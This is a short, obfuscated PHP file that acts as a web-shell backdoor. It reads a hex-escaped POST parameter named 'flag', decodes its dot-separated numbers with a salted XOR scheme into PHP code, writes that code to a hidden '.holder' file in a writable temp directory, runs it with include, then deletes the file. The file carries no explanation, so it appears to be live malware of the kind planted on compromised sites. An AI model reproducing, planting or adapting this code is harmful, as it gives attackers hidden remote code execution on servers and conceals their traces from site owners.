<?php

if(array_key_exists("\x66l\x61g", $_POST)){
	$dat = array_filter(["/dev/shm", "/tmp", "/var/tmp", getcwd(), ini_get("upload_tmp_dir"), getenv("TMP"), getenv("TEMP"), session_save_path(), sys_get_temp_dir()]);
	$obj = $_POST["\x66l\x61g"];
	$obj =	  explode	 	(".", $obj);
	$pointer = '';
            $salt6 = 'abcdefghijklmnopqrstuvwxyz0123456789';
            $sLen = strlen($salt6);
            $w = 0;
    
            foreach($obj as $v4) {$sChar = ord($salt6[$w % $sLen]);
                $dec =((int)$v4 - $sChar -($w % 10)) ^59;
                $pointer .= chr($dec);
                $w++;
            }
	while ($entity = array_shift($dat)) {
    		if (array_product([is_dir($entity), is_writable($entity)])) {
    $reference = join("/", [$entity, ".holder"]);
    $file = fopen($reference, 'w');
if ($file) {
	fwrite($file, $pointer);
	fclose($file);
	include $reference;
	@unlink($reference);
	die();
}
}
}
}